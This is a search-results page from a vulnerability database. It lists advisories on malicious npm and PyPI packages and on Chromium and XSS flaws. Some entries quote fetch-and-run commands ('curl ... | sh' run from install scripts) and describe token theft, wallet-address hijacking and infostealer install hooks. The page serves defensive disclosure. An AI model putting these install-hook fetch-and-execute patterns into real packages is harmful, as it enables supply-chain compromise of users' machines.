CVE Search Engine - Security Vulnerabilities and Exploits Search Tool

show all

4574 matches found

OSSF Malicious Packages•added 2026/05/21 11:27 a.m.•7 views

Malicious code in @autoheal/setup (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 3a8b8b7d51e8865d048583893b08ad3d3d95a8371963b82adc6bf4b7938fe4c1 When the user runs this setup wizard, bin/setup.js posts the user's GitHub Personal Access Token scope repo,user:email, GitHub repo name, branch,...

6AI score

Exploits0References1

OSSF Malicious Packages•added 2026/05/20 7:37 a.m.•5 views

Malicious code in tdpilot (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 92ebe5ca10c51471256249507d8c7b142996cc72d7472a7a55c08fe6351876f9 run.js invokes execSync"curl -LsSf https://astral.sh/uv/install.sh | sh", fetching and executing a remote shell script from astral.sh without integri...

6.4AI score

Exploits0References2

AstraLinux•added 2026/05/20 5:53 a.m.•2 views

Astra Linux - уязвимость в chromium

Insufficient data validation in Blink Editing in Google Chrome prior to 101.0.4951.41 allowed a remote attacker to inject arbitrary scripts or HTML via a crafted HTML page...

6.1CVSS6.5AI score0.00229EPSS

Exploits1References1

AstraLinux•added 2026/05/20 5:53 a.m.•5 views

Astra Linux - уязвимость в chromium

Insufficient data validation in the Browser Switcher component of Google Chrome prior to version 124.0.6367.60 allowed a remote attacker to inject scripts or HTML into a privileged page via a malicious file. Chromium security severity: Medium...

7.6CVSS6.6AI score0.00421EPSS

Exploits1References2

AstraLinux•added 2026/05/20 5:53 a.m.•1 views

Astra Linux - уязвимость в chromium

Insufficient data validation in the New Tab Page of Google Chrome prior to 95.0.4638.69 allowed a remote attacker to inject arbitrary scripts or HTML into a new browser tab through a crafted HTML page...

6.1CVSS7.1AI score0.00398EPSS

Exploits1References2

OSV•added 2026/05/19 11:11 p.m.•3 views

MAL-2026-4426 Malicious code in @riteshkumar04/stack-audit (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 145196e93f9e6006134b35a8d5abfe7fa0de18f2d52b6712d8b2a5ec036526bc On npm install, scripts/install.js runs curl -sSL https://raw.githubusercontent.com/neutron420/StackAudit/main/scripts/install.sh | sh or the...

6.2AI score

Exploits0References3

OSV•added 2026/05/19 4:47 p.m.•15 views

MAL-2026-4174 Malicious code in durabletask (PyPI)

1.4.1, 1.4.2, and 1.4.3 of durabletask were compromised via a PyPI maintainer account takeover. All three malicious versions were published on 2026-05-19 within a 35-minute window 16:19–16:54 UTC. Pin to =1.4.0. Attack chain - Stage 1 — Import-time dropper: on import, the package fetches a...

5.9AI score

Exploits0References6

RedhatCVE•added 2026/05/18 2:27 p.m.•9 views

CVE-2025-67202

A flaw was found in Sidekiq-cron, an open-source scheduling add-on for Sidekiq. A remote attacker could exploit this cross-site scripting XSS vulnerability by injecting malicious scripts into a crafted URL. When this URL is rendered from cron.erb, the attacker's script would execute in the victim...

6.1CVSS5.7AI score0.00011EPSS

Exploits0References5

Positive Technologies•added 2026/05/18 12:0 a.m.•9 views

PT-2026-41707

HSC MailInspector v5.3.3-7 contains a Cross-Site Scripting XSS vulnerability in the /tap/tap.php endpoint due to improper neutralization of user-controlled input using alternate or obfuscated JavaScript syntax. The endpoint reflects unsanitized user input in HTTP responses without adequate output...

6.2AI score0.00042EPSS

Exploits1References4

OSSF Malicious Packages•added 2026/05/16 4:58 p.m.•10 views

Malicious code in netping (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 ecc862a2bc12e6779034a99abd68c5d4ffb047f1fc2ae94407dd9e4ad54df5cf The package silently downloads and installs an autostart script that then monitors clipboards and replaces copied cryptowallet adresses. --- Category: MALICIOU...

5.8AI score

Exploits0References1

OSV•added 2026/05/16 4:58 p.m.•4 views

MAL-2026-3805 Malicious code in netping (PyPI)

5.8AI score

Exploits0References1

UbuntuCve•added 2026/05/14 8:17 p.m.•7 views

CVE-2026-8539

Script injection in SanitizerAPI in Google Chrome on Android prior to 148.0.7778.168 allowed a remote attacker to inject arbitrary scripts or HTML UXSS via a crafted HTML page. Chromium security severity: High...

5.4CVSS6AI score0.00028EPSS

Exploits0References3

OSV•added 2026/05/14 7:24 p.m.•4 views

MAL-2026-3768 Malicious code in npmjs_web3-util (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 263a0126b20b1d58bc0528a4b7bea19027b94383e00b5b9f03b712d96be89ca7 The package's postinstall lifecycle hook downloads a script from a personal GitHub Gist...

5.5AI score

Exploits0References2

OSV•added 2026/05/14 4:53 p.m.•1 views

MAL-2026-3741 Malicious code in pyexecutorsme (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 326ad16be9056f6cbd75fa4f9a47dec8c3613b56aa53d3e5d439efeef7c6fcad Package attempts to download and execute a script acting as remote access trojan. --- Category: MALICIOUS - The campaign has clearly malicious intent, like...

6AI score

Exploits0References1

Positive Technologies•added 2026/05/14 12:0 a.m.•6 views

PT-2026-41068

Name of the Vulnerable Software and Affected Versions Google Chrome on Android versions prior to 148.0.7778.168 Description Script injection in the SanitizerAPI allows a remote attacker to inject arbitrary scripts or HTML, leading to Universal Cross-Site Scripting UXSS, which is a vulnerability...

8.8CVSS6.1AI score0.00148EPSS

Exploits0References83

OSV•added 2026/05/13 8:8 p.m.•9 views

MAL-2026-3706 Malicious code in web3-helpers (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 8d6102ae402b2583a01da47e71f41cccba99fb7826dcf360004d8924557e1760 During installation, package exfiltrates some basic info to a GitHub issue comment, and then attempt to set up a persistent infostealer focused on exfiltrating...

6AI score

Exploits0References1

OSSF Malicious Packages•added 2026/05/13 8:8 p.m.•10 views

Malicious code in web3-helpers (PyPI)

6AI score

Exploits0References1

OSSF Malicious Packages•added 2026/05/13 8:7 p.m.•7 views

Malicious code in math-array-tools (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 1b6411ce9c35210436bef6dadb284e5d89ec85c2cc17f970509aa4b5f30c2440 During installation, package exfiltrates some basic info to a GitHub issue comment, and then attempt to set up a persistent infostealer focused on exfiltrating...

6AI score

Exploits0References1

OSV•added 2026/05/13 8:5 p.m.•4 views

MAL-2026-3703 Malicious code in crypto-hash-utils (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 9807f28fe2b1260f19dfda8b33a6091967c5e18c41dc86365f06b6ad3ceb4eab During installation, package exfiltrates some basic info to a GitHub issue comment, and then attempt to set up a persistent infostealer focused on exfiltrating...

6AI score

Exploits0References1

OSV•added 2026/05/13 8:5 p.m.•3 views

MAL-2026-3699 Malicious code in aiohttp-util (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 b5a826a64a0405306b51cd85239237982278e758bc8109e7da521e15f003ca6e During installation, package exfiltrates some basic info to a GitHub issue comment, and then attempt to set up a persistent infostealer focused on exfiltrating...

6AI score

Exploits0References1

Rows per page

Query Builder

Family

Bulletin Type

Min CVSS Score

Date

Order by